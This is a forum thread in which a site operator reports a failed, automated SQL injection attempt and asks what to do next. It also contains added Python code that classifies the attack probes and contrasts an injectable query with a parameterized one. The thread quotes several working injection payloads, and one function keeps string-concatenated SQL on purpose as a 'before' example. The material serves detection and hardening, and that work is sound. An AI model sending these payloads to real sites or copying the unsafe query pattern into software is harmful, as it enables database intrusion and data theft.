June 30th, 2013, 10:07 PM
SQL Insertion Attempt, no harm, now what?
Not sure if this is the best place for this. Please move/link if there's a more appropriate place.
A site I manage received an unsuccessful SQL Insertion attack.
100 attempts in 3 minutes. It is a generic series of common attempts, so I assume a bot found the page and was just fishing for vulnerability. It is a simple page which processes a GET through an ID.
I don't believe the site is vulnerable to such an attack. (Though I'm motivated to double check.) These kinds of attacks are in my test plans.
I trapped the attacks (gave a generic 'not found' error), logged them, the IP source, and sent myself an alert.
I checked and can see no harm to the database or the site. I blocked the IPs from further contact with the site.
Apparently, the IPs are for known compromised/intentionally malicious servers:
Here are some sample attack attempts:
file.php?ID=99 and 1=1
file.php?ID=99 and 1>1
file.php?ID=99' and 'x'='x
file.php?ID=999999.9 union all select 0x31303235343830303536--
file.php?ID=99 union all select null,null--
file.php?ID=99 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,database(),0x27,0x7e)) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1
file.php?ID=99; if (1=1) waitfor delay '00:00:07'--
file.php?ID=99' or 1=convert(int,(select cast(Char(114)+Char(51)+Char(100)+Char(109)+Char(48)+Char(118)+Char(51)+Char(95)+Char(104)+Char(118)+Char(106)+Char(95)+Char(105)+Char(110)+Char(106)+Char(101)+Char(99)+Char(116)+Char(105)+Char(111)+Char(110) as nvarchar(4000))))--
Are there authorities to whom it would be worth reporting this event?
Any other recommended actions?
Is it valuable to anyone for me to post other examples? (They are pretty much variations on the above.)
Otherwise, I'm just going to clean out my log.
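The trap-log-alert routine the post describes can be turned into a small log analysis: decode the ID parameter, file each probe under the injection family it belongs to (the samples above cover boolean, union, error and time-based probing), and flag a source that fires a burst like the "100 attempts in 3 minutes" seen here. The script below is an added example, not code from the post or from the site in question. It assumes a constructed log format (ISO timestamp, client IP, method, path) and uses documentation-range IPs; the probes in the sample log are the ones quoted in the post, percent-encoded as a web server would record them, with the long convert() payload shortened.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import urlsplit, unquote_plus

# Constructed sample log (not the poster's real log): the probes are the ones
# quoted in the post, percent-encoded as a server would store them; the IPs
# are documentation ranges chosen for this example. One benign lookup from a
# second address is included so the analysis has something to leave alone.
LOG = """\
2013-06-30T22:01:03 203.0.113.5 GET /file.php?ID=99%20and%201=1
2013-06-30T22:01:04 203.0.113.5 GET /file.php?ID=99%20and%201%3E1
2013-06-30T22:01:06 203.0.113.5 GET /file.php?ID=99'%20and%20'x'='x
2013-06-30T22:01:09 203.0.113.5 GET /file.php?ID=999999.9%20union%20all%20select%200x31303235343830303536--
2013-06-30T22:01:12 203.0.113.5 GET /file.php?ID=99%3B%20if%20(1=1)%20waitfor%20delay%20'00:00:07'--
2013-06-30T22:01:15 203.0.113.5 GET /file.php?ID=99'%20or%201=convert(int,(select%20cast(Char(114)%20as%20nvarchar(4000))))--
2013-06-30T22:02:40 198.51.100.7 GET /file.php?ID=42
"""

# Signature families, checked in order: the most specific markers come first
# so a payload that mixes tricks is filed under its most telling one.
SIGNATURES = [
    ("time-based",    re.compile(r"waitfor\s+delay|\bsleep\s*\(|\bbenchmark\s*\(")),
    ("union-based",   re.compile(r"\bunion\b.*\bselect\b")),
    ("error-based",   re.compile(r"\bconvert\s*\(|information_schema|floor\s*\(\s*rand")),
    ("boolean-based", re.compile(r"\b(and|or)\b\s*'?\w+'?\s*[=<>]")),
]

def extract_id(path):
    """Return the decoded value of the ID query parameter, or '' if absent."""
    for pair in urlsplit(path).query.split("&"):
        name, _, value = pair.partition("=")
        if name == "ID":
            return unquote_plus(value)
    return ""

def classify(id_value):
    """'benign' for a plain integer ID, else the signature family or 'malformed'."""
    v = id_value.strip().lower()
    if re.fullmatch(r"\d+", v):
        return "benign"
    for family, pattern in SIGNATURES:
        if pattern.search(v):
            return family
    return "malformed"

def analyze(log_text, threshold=20, window_minutes=3):
    """Per-IP summary of non-benign requests. 'burst' is True when at least
    `threshold` of them fall inside any span of `window_minutes` minutes."""
    window = timedelta(minutes=window_minutes)
    events = defaultdict(list)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, ip, _method, path = line.split()
        family = classify(extract_id(path))
        if family != "benign":
            events[ip].append((datetime.fromisoformat(ts), family))
    report = {}
    for ip, evs in events.items():
        times = sorted(t for t, _ in evs)
        # Sliding window: the largest number of probes starting at any one probe.
        peak = max(sum(1 for t in times if t0 <= t < t0 + window) for t0 in times)
        report[ip] = {
            "attempts": len(evs),
            "families": sorted({f for _, f in evs}),
            "burst": peak >= threshold,
        }
    return report

if __name__ == "__main__":
    for ip, summary in analyze(LOG, threshold=5).items():
        print(ip, summary)
```

The family labels are what make the alert useful beyond "someone sent odd input": a burst that stays boolean and union-based is a scanner probing; a run that progresses to time-based or error-based payloads against the same ID suggests the earlier probes got a response the bot liked, which is the moment to re-check the handler rather than just block the address.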
No. Assuming you're in the US, attacking a site like that is probably against some law, but the only organizations with the jurisdiction and resources to actually do something about it have far more important things to do with their resources (unless your site happens to be for a major financial or governmental organization).
If the site is already secured then no.
Not that I can think of.
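"If the site is already secured" rests on how the GET-by-ID handler builds its query, which is the thing the poster wants to double check. The following is an added example, not code from the post or from the site (the site is PHP; this models the handler in Python against an in-memory SQLite table whose schema is invented for the example). It places the injectable string-concatenation pattern beside the hardened form (integer allow-list plus a bound parameter) and runs the first two probes from the post against both: the true/false pair is exactly the differential a scanner uses, so a handler that answers both the same way has nothing to reveal.

```python
import re
import sqlite3

def make_db():
    """Constructed stand-in for the site's table; the post names no schema."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE items (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO items VALUES (?, ?)", [(42, "widget"), (99, "gadget")])
    return conn

def lookup_unsafe(conn, raw_id):
    """The pattern that makes a GET-by-ID page injectable: the parameter is
    spliced into the SQL text. Kept only as the 'before' for comparison."""
    try:
        row = conn.execute("SELECT name FROM items WHERE id = " + raw_id).fetchone()
    except sqlite3.Error:
        return None            # a DB error collapses into the same generic 'not found'
    return row[0] if row else None

# Allow-list: an ID is a short run of digits and nothing else.
ID_PATTERN = re.compile(r"\d{1,10}")

def lookup_safe(conn, raw_id):
    """Validate against the allow-list, then bind the value as a parameter so
    it can only ever be compared as an integer."""
    if not ID_PATTERN.fullmatch(raw_id):
        return None            # generic 'not found', as the post's handler does
    row = conn.execute("SELECT name FROM items WHERE id = ?", (int(raw_id),)).fetchone()
    return row[0] if row else None

def boolean_probe_differs(conn, lookup):
    """Self-check using the first two probes quoted in the post: if a true and
    a false condition appended to a valid ID yield different responses, the
    parameter reaches the SQL engine. A secured handler answers both alike."""
    return lookup(conn, "99 and 1=1") != lookup(conn, "99 and 1>1")

if __name__ == "__main__":
    conn = make_db()
    print("unsafe handler distinguishable by probe:", boolean_probe_differs(conn, lookup_unsafe))
    print("safe handler distinguishable by probe:  ", boolean_probe_differs(conn, lookup_safe))
```

In the PHP the post implies, the same two steps are casting the parameter (`(int)$_GET['ID']`, or rejecting anything that is not all digits) and running the query through a prepared statement with a bound parameter; the allow-list alone stops every sample in the post, and the bound parameter keeps the page safe if the ID column is later widened to accept non-numeric keys.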